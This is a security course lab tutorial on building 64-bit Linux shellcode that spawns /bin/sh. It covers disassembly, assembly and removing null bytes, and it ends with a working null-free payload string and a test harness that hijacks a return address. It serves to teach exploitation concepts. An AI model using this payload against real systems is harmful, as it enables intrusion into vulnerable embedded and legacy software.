Shellcode
Introduction
Shellcode is used in buffer overflow attacks. It is simply binary machine instructions in string format. In general, shellcode is difficult to create, but extremely easy to find. This tutorial explains how to create shellcode.
The ideas in this tutorial are taken from Aleph One's "Smashing The Stack For Fun And Profit". The material has been rewritten to expand the explanations and to work on modern systems (specifically 64-bit Linux kernels).
While this kind of attack is usually blocked on modern computers by mitigations such as non-executable stacks and stack protectors, it is still often possible on embedded systems and IoT devices.
Executing a shell
The first task is to build a C program that will execute a shell. It should be as simple as possible. Here is a very simple C program that does just that:
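// shellcode.c
#include <unistd.h>
int main() {
    char *array[2];
    array[0] = "/bin/sh";            // program to execute, also used as argv[0]
    array[1] = NULL;                 // argv must end with a NULL pointer
    execve(array[0], array, NULL);   // no environment is passed
    return 0;                        // only reached if execve fails
}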
Compile it and make sure that it works correctly. Note that it is compiled statically (-static); this is important for some of the next steps.
gcc -static -o shellcode shellcode.c
It works just as expected. Now the program needs to be disassembled. To disassemble the execve function, its code has to be part of the program itself, which is why the -static flag was needed. gdb is used to disassemble the important functions.
root:~# gdb shellcode
(gdb) disass main
Dump of assembler code for function main:
0x0000000000401b8d <+0>: push %rbp
0x0000000000401b8e <+1>: mov %rsp,%rbp
0x0000000000401b91 <+4>: sub $0x10,%rsp
0x0000000000401b95 <+8>: lea 0x7b468(%rip),%rax # 0x47d004
0x0000000000401b9c <+15>: mov %rax,-0x10(%rbp)
0x0000000000401ba0 <+19>: movq $0x0,-0x8(%rbp)
0x0000000000401ba8 <+27>: mov -0x10(%rbp),%rax
0x0000000000401bac <+31>: lea -0x10(%rbp),%rcx
0x0000000000401bb0 <+35>: mov $0x0,%edx
0x0000000000401bb5 <+40>: mov %rcx,%rsi
0x0000000000401bb8 <+43>: mov %rax,%rdi
0x0000000000401bbb <+46>: callq 0x43c700 <execve>
0x0000000000401bc0 <+51>: mov $0x0,%eax
0x0000000000401bc5 <+56>: leaveq
0x0000000000401bc6 <+57>: retq
End of assembler dump.
(gdb) disass execve
Dump of assembler code for function execve:
0x000000000043c700 <+0>: mov $0x3b,%eax
0x000000000043c705 <+5>: syscall
0x000000000043c707 <+7>: cmp $0xfffffffffffff001,%rax
0x000000000043c70d <+13>: jae 0x43c710 <execve+16>
0x000000000043c70f <+15>: retq
0x000000000043c710 <+16>: mov $0xffffffffffffffc0,%rcx
0x000000000043c717 <+23>: neg %eax
0x000000000043c719 <+25>: mov %eax,%fs:(%rcx)
0x000000000043c71c <+28>: or $0xffffffffffffffff,%rax
0x000000000043c720 <+32>: retq
End of assembler dump.
(gdb) quit
What's actually going on here? The following table explains what the different groups of instructions are doing. Syscall numbers can be looked up at https://filippo.io/linux-syscall-table/.
Explanation | Instructions |
---|---|
Set up the stack frame for main | push %rbp; mov %rsp,%rbp; sub $0x10,%rsp |
Compute the address of the string /bin/sh and store it on the stack (this is array[0]) | lea 0x7b468(%rip),%rax; mov %rax,-0x10(%rbp) |
Zero the eight bytes after the address of the string (this is array[1]). This is required because the execve syscall needs a NULL-terminated array for its argv parameter. | movq $0x0,-0x8(%rbp) |
Load the address of the /bin/sh string into rax | mov -0x10(%rbp),%rax |
Load the address of array into rcx. This is the address of the address of /bin/sh, because the argv parameter is an array of pointers. | lea -0x10(%rbp),%rcx |
Set edx to zero (which also clears the upper half of rdx). The third parameter of execve, envp, is not used, so NULL is passed. | mov $0x0,%edx |
Move the values into the registers required by the x86-64 Linux calling convention: first argument in rdi, second in rsi, third in rdx | mov %rcx,%rsi; mov %rax,%rdi |
Call the statically linked execve function | callq 0x43c700 <execve> |
Complete main and return 0 | mov $0x0,%eax; leaveq; retq |
With the knowledge of what is happening in main, it's possible to figure out what's happening within the execve function.
Explanation | Instructions |
---|---|
Set the syscall number for execve (0x3b) | mov $0x3b,%eax |
The arguments are already in place, because the calling convention used from main to execve is almost the same as the one for the syscall itself. Therefore, the syscall can simply be performed now. | syscall |
Error handling. On success the syscall never returns (execution of /bin/sh begins instead), so these instructions only run if execve fails: they store the error code in errno and return -1. | cmp $0xfffffffffffff001,%rax; jae 0x43c710 <execve+16>; retq; mov $0xffffffffffffffc0,%rcx; neg %eax; mov %eax,%fs:(%rcx); or $0xffffffffffffffff,%rax; retq |
There are a lot of instructions here, and not all of them are needed. The shorter the shellcode is, the more robust it is, since it has to fit inside the buffer being overflowed.
First, the following things must exist in memory:
- The null-terminated string /bin/sh
- The address of the string followed by an eight-byte NULL (this is array)
- The address of array
Then all that needs to be done is:
- Put the address of /bin/sh into rdi
- Put the address of array into rsi
- Put a NULL into rdx
- Put 0x3b into rax
- Execute the syscall instruction
If the execve call fails, though, the program should exit cleanly. To do this, a call to exit can be added to the end of the shellcode. It's not too much extra trouble.
Exiting a program is actually very simple: place the exit code in rdi, as the calling convention requires, and use syscall number 0x3c. On Linux (and many other systems), an exit code of 0 indicates that a program completed without an error.
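The syscall numbers used here can be checked against the kernel headers. The following is a minimal sketch, assuming an x86-64 Linux system with glibc. The helper names execve_number, exit_number and raw_getpid are hypothetical and only serve the illustration. The harmless getpid syscall stands in for execve to show that a libc wrapper amounts to loading a syscall number and executing syscall.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>   /* SYS_execve, SYS_exit, SYS_getpid */
#include <unistd.h>        /* syscall(), getpid() */

/* Syscall numbers as defined by the kernel headers for the build target.
 * On x86-64 Linux these are 0x3b (execve) and 0x3c (exit). */
long execve_number(void) { return SYS_execve; }
long exit_number(void)   { return SYS_exit; }

/* Hypothetical helper: invoke getpid through the generic syscall() entry
 * point instead of going through the getpid() wrapper. */
long raw_getpid(void) {
    long pid = syscall(SYS_getpid);
    assert(pid > 0);   /* getpid cannot fail */
    return pid;
}
```

Calling raw_getpid() should return the same value as getpid(), and on x86-64 the two number helpers should return 0x3b and 0x3c, matching the values seen in the disassembly.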
Compiling the assembly instructions
Now that the basics of what needs to be done have been figured out, it's time to put it all together. With /bin/sh in memory, here's what needs to be done:
- Put the address of /bin/sh in rdi
- Ensure /bin/sh is null terminated with a '\0'
- Put the address of /bin/sh in array[0]
- Put an eight-byte NULL in array[1]
- Put the address of the array into rsi
- Put a NULL into rdx
- Put 0x3b in rax
- Call syscall
- Store 0x0 in rdi
- Store 0x3c in rax
- Call syscall
This roughly translates to:
???? %rdi # get string into rdi
movb $0x0, string-end(%rdi) # null terminate string
movq %rdi, array-0-offset(%rdi) # store address of string
movq $0x0, array-1-offset(%rdi) # null terminate array
movq $0x0, %rdx # put a null in rdx
leaq array-0-offset(%rdi), %rsi # put array address in rsi
movq $0x3b, %rax # set syscall number for execve
syscall # do the syscall execve
movq $0x0, %rdi # set exit status of 0
movq $0x3c, %rax # set syscall number for exit
syscall # do the syscall exit
.string "/bin/sh"
This is all well and good, but the address of the /bin/sh string isn't known. It could end up anywhere in the program, and there's no way of knowing in advance. On 32-bit x86, the usual trick was to use the call instruction, which pushes the address of the next instruction onto the stack. That trick still works on x86-64, but the 64-bit instruction set offers a more direct way of obtaining addresses. You may be familiar with the instruction pointer, rip, which holds the address of the next instruction to be executed. Although rip cannot be accessed like a general-purpose register, it can be used as a base address in the lea instruction.
lea (%rip), %rdi # (7) get the address of rip
addq inst-offset, %rdi # (4) add the offset to calculate the address of "/bin/sh"
movb $0x0, string-len(%rdi) # (4) null terminate string
movq %rdi, array-0-offset(%rdi) # (4) store address of string
movq $0x0, array-1-offset(%rdi) # (8) null terminate array
movq $0x0, %rdx # (7) put a null in rdx
leaq array-0-offset(%rdi), %rsi # (4) put array in rsi
movq $0x3b, %rax # (7) set syscall number for execve
syscall # (2) do the syscall execve
movq $0x0, %rdi # (7) set exit status of 0
movq $0x3c, %rax # (7) set syscall number for exit
syscall # (2) do the syscall exit
.string "/bin/sh"
The number of bytes for each instruction has been included in the above instructions.
This is pretty much the final assembly code, but the offsets need to be determined. To know what the offsets are, a memory location for the array has to be chosen. Since the program won't be executing any other instructions, any writable memory location within the program's address space will work. A good place for it is just after the /bin/sh string.
Indicating the 8-byte address of /bin/sh with addr and the 8-byte NULL with null, the goal is to lay out the memory like this:
/bin/sh\0[addr][null]
- STRING_LEN is 0x7, since the string is 7 characters long
- ARRAY_0_OFFSET is 0x8, to begin the array just after the null character in the string
- ARRAY_1_OFFSET is 0x10, 8 bytes after ARRAY_0_OFFSET
For clarity, the (approximate) C equivalent of what's happening is this:
char string[24] = "/bin/sh";   /* 8 bytes for the string, then two 8-byte array slots */
char *null_terminator = string + STRING_LEN;
long *string_addr = (long *)(string + ARRAY_0_OFFSET);
long *null_addr = (long *)(string + ARRAY_1_OFFSET);
*null_terminator = '\0';
*string_addr = (long)string;
*null_addr = 0;
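The three offsets can also be double-checked by letting the compiler compute them. This is a sketch only, assuming a platform with 8-byte pointers such as x86-64 Linux. The struct exec_layout and the function build_layout are hypothetical names introduced for the illustration and are not part of the shellcode.

```c
#include <assert.h>
#include <stddef.h>   /* offsetof, NULL */
#include <string.h>   /* memcpy */

/* Hypothetical struct mirroring the intended layout: /bin/sh\0[addr][null] */
struct exec_layout {
    char  string[8];   /* "/bin/sh" plus its terminating '\0' */
    char *argv0;       /* array[0]: address of the string */
    char *argv1;       /* array[1]: NULL, terminates the array */
};

/* Fill in the layout the same way the shellcode does at run time. */
void build_layout(struct exec_layout *l) {
    assert(l != NULL);
    memcpy(l->string, "/bin/sh", 7);
    l->string[7] = '\0';     /* STRING_LEN     = 0x7  */
    l->argv0 = l->string;    /* ARRAY_0_OFFSET = 0x8  */
    l->argv1 = NULL;         /* ARRAY_1_OFFSET = 0x10 */
}
```

With 8-byte pointers, offsetof(struct exec_layout, argv0) is 0x8 and offsetof(struct exec_layout, argv1) is 0x10, and the whole structure occupies 24 bytes.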
To resolve the instruction offset, count the number of bytes from the end of the lea instruction to the beginning of /bin/sh. It's 56, so the instruction becomes addq $56, %rdi. A main label and a .globl directive are also added so that the program assembles correctly. You may wonder why the instruction offset is a separate instruction at all. It is only there for clarity and to make the code easier to modify by hand. You could instead add the offset to each of the other constants, or fold it into the displacement of the lea instruction (although a small positive displacement is encoded with null bytes, which becomes a problem later), and the shellcode would still work. It is left as a separate instruction in this example.
main:
lea (%rip), %rdi # (7) get the address of rip
addq $56, %rdi # (4) add the offset to calculate the address of "/bin/sh"
movb $0x0, 0x7(%rdi) # (4) null terminate string
movq %rdi, 0x8(%rdi) # (4) store address of string
movq $0x0, 0x10(%rdi) # (8) null terminate array
movq $0x0, %rdx # (7) put a null in rdx
leaq 0x8(%rdi), %rsi # (4) put array in rsi
movq $0x3b, %rax # (7) set syscall number for execve
syscall # (2) do the syscall execve
movq $0x0, %rdi # (7) set exit status of 0
movq $0x3c, %rax # (7) set syscall number for exit
syscall # (2) do the syscall exit
.string "/bin/sh"
.globl main
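The offset of 56 can be verified by summing the instruction lengths annotated in the listing. The sketch below does only that arithmetic. The names insn_lengths and string_offset are hypothetical, and the lengths are copied from the "(n)" annotations rather than measured.

```c
#include <assert.h>
#include <stddef.h>

/* Encoded lengths, in bytes, of every instruction that follows the initial
 * lea, copied from the "(n)" annotations in the listing. */
const unsigned char insn_lengths[] = {
    4, /* addq  $56, %rdi        */
    4, /* movb  $0x0, 0x7(%rdi)  */
    4, /* movq  %rdi, 0x8(%rdi)  */
    8, /* movq  $0x0, 0x10(%rdi) */
    7, /* movq  $0x0, %rdx       */
    4, /* leaq  0x8(%rdi), %rsi  */
    7, /* movq  $0x3b, %rax      */
    2, /* syscall                */
    7, /* movq  $0x0, %rdi       */
    7, /* movq  $0x3c, %rax      */
    2, /* syscall                */
};

/* Distance from the end of the lea (the rip value it captures) to the
 * first byte of "/bin/sh": the sum of all instruction lengths in between. */
size_t string_offset(const unsigned char *lengths, size_t count) {
    assert(lengths != NULL);
    size_t total = 0;
    for (size_t i = 0; i < count; i++)
        total += lengths[i];
    return total;
}
```

Calling string_offset(insn_lengths, sizeof insn_lengths) gives 56 (0x38), the constant used in the addq instruction. The same helper can be reused whenever an instruction is added or removed.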
The assembly listing is easy to build with gcc. Just put it in a file with a .s extension, and gcc knows that it contains assembly instructions. The main label and the .globl directive define a main function so the program links properly.
root:~# gcc -g -o shellcode shellcode.s
Disassembling the program in gdb will ensure gcc didn't change anything.
root:~# gdb shellcode
(gdb) disass main
Dump of assembler code for function main:
0x0000000000001125 <+0>: lea 0x0(%rip),%rdi # 0x112c <main+7>
0x000000000000112c <+7>: add $0x38,%rdi
0x0000000000001130 <+11>: movb $0x0,0x7(%rdi)
0x0000000000001134 <+15>: mov %rdi,0x8(%rdi)
0x0000000000001138 <+19>: movq $0x0,0x10(%rdi)
0x0000000000001140 <+27>: mov $0x0,%rdx
0x0000000000001147 <+34>: lea 0x8(%rdi),%rsi
0x000000000000114b <+38>: mov $0x3b,%rax
0x0000000000001152 <+45>: syscall
0x0000000000001154 <+47>: mov $0x0,%rdi
0x000000000000115b <+54>: mov $0x3c,%rax
0x0000000000001162 <+61>: syscall
0x0000000000001164 <+63>: (bad)
0x0000000000001165 <+64>: (bad)
0x0000000000001166 <+65>: imul $0xf006873,0x2f(%rsi),%ebp
0x000000000000116d <+72>: (bad)
0x000000000000116e <+73>: add %al,0x57(%rcx)
It looks fine, but if you try to run this program, it will segfault. The reason is that the program modifies itself. When compiled this way, the instructions (as well as the string) are in the text/code section of the program. Modern kernels map this section as read-only. When the program tries to write a null byte at the end of /bin/sh, it crashes.
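The read-only mapping can be observed directly on Linux. The following sketch assumes that /proc/self/maps is available and has its usual format. The function mapping_perms is a hypothetical helper that looks up the permission string of the mapping containing a given address.

```c
#include <assert.h>
#include <inttypes.h>   /* SCNx64 */
#include <stdint.h>
#include <stdio.h>

/* Look up the mapping that contains addr in /proc/self/maps and copy its
 * permission string (for example "r-xp") into perms.
 * Returns 0 on success, -1 if the file is unavailable or addr is unmapped. */
int mapping_perms(uintptr_t addr, char perms[5]) {
    assert(perms != NULL);
    FILE *maps = fopen("/proc/self/maps", "r");
    if (maps == NULL)
        return -1;

    char line[512];
    int found = -1;
    while (fgets(line, sizeof line, maps) != NULL) {
        uint64_t start, end;
        char field[5];
        /* Each line starts with "start-end perms", addresses in hex. */
        if (sscanf(line, "%" SCNx64 "-%" SCNx64 " %4s", &start, &end, field) != 3)
            continue;
        if (addr >= start && addr < end) {
            snprintf(perms, 5, "%s", field);
            found = 0;
            break;
        }
    }
    fclose(maps);
    return found;
}
```

Passing the address of a function typically reports a mapping without the w flag, while passing the address of a local variable reports a writable stack mapping. That difference is why the write to /bin/sh faults when the string lives in the text section.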
The crash is not a problem here, because when the shellcode is actually used it will be executing on the stack, which is writable. To quickly prepare it for the stack, objdump can print the raw bytes of each instruction.
root:~# objdump -d shellcode | grep -A20 '<main>:'
0000000000001125 <main>:
1125: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # 112c <main+0x7>
112c: 48 83 c7 38 add $0x38,%rdi
1130: c6 47 07 00 movb $0x0,0x7(%rdi)
1134: 48 89 7f 08 mov %rdi,0x8(%rdi)
1138: 48 c7 47 10 00 00 00 movq $0x0,0x10(%rdi)
113f: 00
1140: 48 c7 c2 00 00 00 00 mov $0x0,%rdx
1147: 48 8d 77 08 lea 0x8(%rdi),%rsi
114b: 48 c7 c0 3b 00 00 00 mov $0x3b,%rax
1152: 0f 05 syscall
1154: 48 c7 c7 00 00 00 00 mov $0x0,%rdi
115b: 48 c7 c0 3c 00 00 00 mov $0x3c,%rax
1162: 0f 05 syscall
1164: 2f (bad)
1165: 62 (bad)
1166: 69 6e 2f 73 68 00 0f imul $0xf006873,0x2f(%rsi),%ebp
116d: 1f (bad)
116e: 40 rex
Everything up through the final syscall instruction is a normal instruction. The bytes after it are the string /bin/sh, which objdump has tried to decode as instructions; in the shellcode they can simply be written as the literal string /bin/sh. The shellcode can be tested in a simple program.
char shellcode[] =
"\x48\x8d\x3d\x00\x00\x00\x00\x48\x83\xc7\x38\xc6\x47\x07\x00\x48\x89\x7f\x08\x48\xc7\x47\x10\x00\x00\x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x48\x8d\x77\x08\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\x48\xc7\xc7\x00\x00\x00\x00\x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05/bin/sh";
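void shell() {
    long* ret;
    // Assumes ret sits directly below the saved rbp, so that two slots
    // above it is the saved return address of shell().
    ret = (long*)&ret + 2;
    (*ret) = (long)shellcode;   // make shell() return into the shellcode
}
int main() {
    shell();
    return 0;
}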
Now just compile (allowing the stack to be executable) and run:
root:~# gcc -g -z execstack -fno-stack-protector -o shellcode shellcode.c
root:~# ./shellcode
# exit
root:~#
It works properly. You should run this executable in gdb and step through each line of assembly to confirm your understanding of what is happening.
Removing null characters
Many buffer overflow exploits rely on functions that read strings until reaching a null character. If there are any null characters in the shellcode, the function will stop reading at the first one, and the rest of the shellcode will not make its way into the program. Fortunately, it's pretty simple to replace instructions that contain null characters. The following table lists the instructions that cause problems and their replacements.
Problem | Replacement |
---|---|
leaq 0x0(%rip),%rdi | leaq -0x1(%rip),%rdi (add one to the instruction offset to compensate for this) |
movb $0x0, 0x7(%rdi); movq $0x0, 0x10(%rdi); movq $0x0, %rdx | xorq %rax, %rax; movb %al, 0x7(%rdi); movq %rax, 0x10(%rdi); movq %rax, %rdx |
movq $0x3b, %rax; movq $0x3c, %rax | xorq %rax, %rax; addb $0x3b, %al (or $0x3c) |
movq $0x0, %rdi | xorq %rdi, %rdi |
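To see why these replacements matter, the encodings can be compared byte by byte. The sketch below is illustrative only. The function count_nulls and the array names are hypothetical, and the byte values are copied from the objdump listings in this tutorial.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>   /* strlen */

/* Count the 0x00 bytes in an encoded instruction sequence. */
size_t count_nulls(const unsigned char *code, size_t len) {
    assert(code != NULL);
    size_t nulls = 0;
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            nulls++;
    return nulls;
}

/* movq $0x3b, %rax: the 32-bit immediate is padded with zero bytes. */
const unsigned char mov_imm[] = { 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00 };

/* xorq %rax, %rax ; addb $0x3b, %al: the null-free replacement. */
const unsigned char xor_add[] = { 0x48, 0x31, 0xc0, 0x04, 0x3b };

/* Start of the original shellcode: lea 0x0(%rip),%rdi ; add $0x38,%rdi */
const char original_start[] = "\x48\x8d\x3d\x00\x00\x00\x00\x48\x83\xc7\x38";
```

Here count_nulls reports three null bytes for mov_imm and none for xor_add. Calling strlen(original_start) returns 3 even though the array holds 11 bytes of code, which is exactly the truncation a string-copying function would cause.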
With these replacements applied, the assembly instructions become:
main:
leaq -0x1(%rip), %rdi
addq $0x28, %rdi
xorq %rax, %rax
movb %al, 0x7(%rdi)
movq %rdi, 0x8(%rdi)
movq %rax, 0x10(%rdi)
movq %rax, %rdx
leaq 0x8(%rdi), %rsi
addb $0x3b, %al
syscall
xorq %rdi, %rdi
xorq %rax, %rax
addb $0x3c, %al
syscall
.string "/bin/sh"
.globl main
Note that the instruction offset has changed, since the instructions were modified. Assembling this and running objdump on the result gives the following:
root:~# gcc -g -o shellcode shellcode.s
root:~# objdump -d shellcode | grep -A20 '<main>:'
0000000000001125 <main>:
1125: 48 8d 3d ff ff ff ff lea -0x1(%rip),%rdi # 112b <main+0x6>
112c: 48 83 c7 28 add $0x28,%rdi
1130: 48 31 c0 xor %rax,%rax
1133: 88 47 07 mov %al,0x7(%rdi)
1136: 48 89 7f 08 mov %rdi,0x8(%rdi)
113a: 48 89 47 10 mov %rax,0x10(%rdi)
113e: 48 89 c2 mov %rax,%rdx
1141: 48 8d 77 08 lea 0x8(%rdi),%rsi
1145: 04 3b add $0x3b,%al
1147: 0f 05 syscall
1149: 48 31 ff xor %rdi,%rdi
114c: 48 31 c0 xor %rax,%rax
114f: 04 3c add $0x3c,%al
1151: 0f 05 syscall
1153: 2f (bad)
1154: 62 (bad)
1155: 69 6e 2f 73 68 00 0f imul $0xf006873,0x2f(%rsi),%ebp
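As expected, all of the nulls have been removed. The only remaining null is the terminator that the .string directive places after /bin/sh (followed by unrelated bytes), and it is not part of the shellcode, so we can update our shellcode: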
char shellcode[] =
"\x48\x8d\x3d\xff\xff\xff\xff\x48\x83\xc7\x28\x48\x31\xc0\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x89\xc2\x48\x8d\x77\x08\x04\x3b\x0f\x05\x48\x31\xff\x48\x31\xc0\x04\x3c\x0f\x05/bin/sh";
Compiling it and running it in the previous shellcode.c program shows that the shellcode works, and now it has no null characters.
root:~# gcc -g -z execstack -fno-stack-protector -o shellcode shellcode.c
root:~# ./shellcode
$ exit
root:~#
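The absence of null bytes can also be checked mechanically instead of by reading the objdump output. This is a small sketch that only inspects the bytes and never executes them. The function is_null_free is a hypothetical helper, and the byte string is the one shown above, split per instruction for readability.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>   /* memchr */

/* Null-free shellcode from this section: 46 bytes of instructions
 * followed by the 7 characters of "/bin/sh". */
const char shellcode[] =
    "\x48\x8d\x3d\xff\xff\xff\xff"   /* lea  -0x1(%rip),%rdi */
    "\x48\x83\xc7\x28"               /* add  $0x28,%rdi      */
    "\x48\x31\xc0"                   /* xor  %rax,%rax       */
    "\x88\x47\x07"                   /* mov  %al,0x7(%rdi)   */
    "\x48\x89\x7f\x08"               /* mov  %rdi,0x8(%rdi)  */
    "\x48\x89\x47\x10"               /* mov  %rax,0x10(%rdi) */
    "\x48\x89\xc2"                   /* mov  %rax,%rdx       */
    "\x48\x8d\x77\x08"               /* lea  0x8(%rdi),%rsi  */
    "\x04\x3b"                       /* add  $0x3b,%al       */
    "\x0f\x05"                       /* syscall              */
    "\x48\x31\xff"                   /* xor  %rdi,%rdi       */
    "\x48\x31\xc0"                   /* xor  %rax,%rax       */
    "\x04\x3c"                       /* add  $0x3c,%al       */
    "\x0f\x05"                       /* syscall              */
    "/bin/sh";

/* Returns 1 when the first len bytes of code contain no 0x00 byte, i.e.
 * when a function such as strcpy would copy all of them. */
int is_null_free(const char *code, size_t len) {
    assert(code != NULL);
    return memchr(code, 0x00, len) == NULL;
}
```

Calling is_null_free(shellcode, sizeof shellcode - 1) returns 1. The "- 1" excludes the terminator that C appends to the string literal, which is the only null byte in the array.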
Using the shellcode
Shellcode is used in buffer overflow attacks. To learn more about how to use the shellcode, read about buffer overflows.
Classwork
For submission, run some commands after you get the shell from executing the program and take a screenshot.
NOTE: You may find that this lab is very easy to complete by copying the steps shown above. While that is sufficient to get credit right now, you will find that you won't have learned the skills required to do subsequent assignments effectively. Unless you have an unusual schedule, it is better for you to spend the time required to understand this concept now rather than later.
As a challenge to test your understanding, try modifying this shellcode to work without null terminating the string dynamically, and instead use the null terminator implicitly provided by C (optional).
Copyright 2020 the following:
Aaron Nelson
Nate Tracy-Amoroso
Copyright 2008 the following:
Sam McIngvale sam.mcingvale@u.northwestern.edu
Jim Spadaro j-spadaro@northwestern.edu
Whitney Young wbyoung@u.northwestern.edu
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.